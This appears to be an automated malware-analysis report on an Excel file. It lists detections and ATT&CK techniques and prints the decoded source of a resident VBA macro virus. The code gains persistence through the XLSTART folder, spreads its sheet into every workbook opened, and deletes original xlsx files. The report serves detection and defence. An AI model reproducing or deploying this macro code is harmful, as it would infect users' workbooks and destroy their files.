MALICIOUS
176
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1553.005 Security Software Modification
The critical ClamAV detection and high-severity heuristics indicate this Excel file is malicious. The VBA macros are designed to copy the workbook to the Excel XLSTART startup folder as 'mypersonnel.xls' and also attempt to infect other workbooks via an OnSheetActivate hook, establishing persistence and spreading capabilities.
Heuristics 6
-
ClamAV: Xls.Malware.ExcelSic-10005885-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.ExcelSic-10005885-1
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCEThe macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.Matched line in script
'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls" -
VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADERThe macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.Matched line in script
Application.OnSheetActivate = "" -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub Auto_Close()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1822 bytes |
SHA-256: 7d77c4284792aa11ef11e16021f483157e8d664c4835a8f227b2b73f4b12e070 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Kangatang"
Sub Auto_Open()
Application.EnableCancelKey = xlDisabled
'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls"
Application.DisplayAlerts = False
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath Then
Application.ScreenUpdating = False
Windows(1).Visible = False
ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\mypersonnel.xls"
Windows(1).Visible = True
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "mypersonnel.xls!allocated"
End Sub
Sub Auto_Close()
On Error Resume Next
Application.DisplayAlerts = False
If Right(ThisWorkbook.Name, 4) <> "xlsx" Or Application.Version <= 11 Then Exit Sub
ThisWorkbook.SaveAs Filename:=ThisWorkbook.Path & "\" & Replace(ThisWorkbook.Name, ".xlsx", ".xls"), _
FileFormat:=xlExcel8, Password:="", WriteResPassword:="", _
ReadOnlyRecommended:=False, CreateBackup:=False
Kill ThisWorkbook.Path & "\" & Replace(ThisWorkbook.Name, ".xls", ".xlsx")
End Sub
Sub allocated()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "Kangatang" Then
Application.ScreenUpdating = False
currentsh = ActiveSheet.Name
ThisWorkbook.Sheets("Kangatang").Copy before:=ActiveWorkbook.Sheets(1)
ActiveWorkbook.Sheets(currentsh).Select
Application.ScreenUpdating = True
End If
End Sub
Attribute VB_Name = "Sô_la_mviê_cNa_y"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.